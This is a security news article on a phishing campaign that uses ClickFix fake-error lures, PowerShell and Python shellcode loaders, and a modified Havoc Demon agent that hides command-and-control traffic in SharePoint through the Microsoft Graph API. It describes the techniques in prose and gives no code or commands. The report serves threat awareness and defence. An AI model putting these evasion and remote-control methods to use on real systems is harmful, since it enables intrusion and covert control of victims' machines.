A newly discovered phishing campaign is leveraging the open-source Havoc command-and-control (C2) framework in a multi-stage attack designed to evade detection. This campaign integrates ClickFix phishing tactics, PowerShell, and Python scripts with a modified Havoc Demon Agent, using the Microsoft Graph API to disguise C2 communication within trusted cloud services.
The attack begins with a phishing email containing an HTML attachment named ‘Documents.html.’ The email employs urgency to prompt the recipient into opening the attachment — a technique that is often used by threat actors. The threat actors utilise ClickFix where they embed a fake error message to trick users into manually executing a malicious PowerShell command.
On decoding the base64-encoded script within the attachment, researchers discovered a PowerShell command that downloads a remote script hosted on a SharePoint site controlled by the attackers.
The script first checks for sandbox environments by counting domain computers, deleting specific registry entries as an infection marker, and ensuring the presence of a Python interpreter before executing a malicious Python script.
The downloaded Python script, also hosted on SharePoint, is a shellcode loader. Executing the script reveals debug messages in Russian, indicating memory allocation, writing to memory, and shellcode execution. This script is key to deploying the final payload — leveraging the KaynLdr shellcode loader to execute an embedded DLL, which is a modified version of the Havoc Demon Agent.
Havoc is a well-known C2 framework used in both red teaming and cyberattacks. In this campaign, threat actors modified Havoc to leverage Microsoft Graph API for stealthy C2 communication. The attackers store command-and-control files within a SharePoint document library, utilising a hardcoded secret to obtain access tokens via the Microsoft Identity Platform.
As researchers discovered, these tokens allow the threat actors to create and manipulate files in SharePoint, establishing a covert communication channel. The C2 mechanism involves the agent sending an initial ‘CheckIn’ request containing victim metadata, including hostname, user details, OS information, and process details.
All transmitted data is encrypted using AES-256 in CTR mode. The attacker’s commands are retrieved through specially crafted files in SharePoint, ensuring continued control over the compromised system.
Once the agent is connected, it enters a dispatcher routine to await further instructions from the attacker. The support commands include reconnaissance, file manipulation, command execution, token manipulation, and Kerberos attack.
“Public services once again play a crucial role in the attack campaign, now further integrated with modified Havoc Demon to hide malicious communication within the Microsoft Graph API, making identification and detection even more challenging,” researchers concluded.
In the News: Indian food delivery platform Sewacity allegedly breached
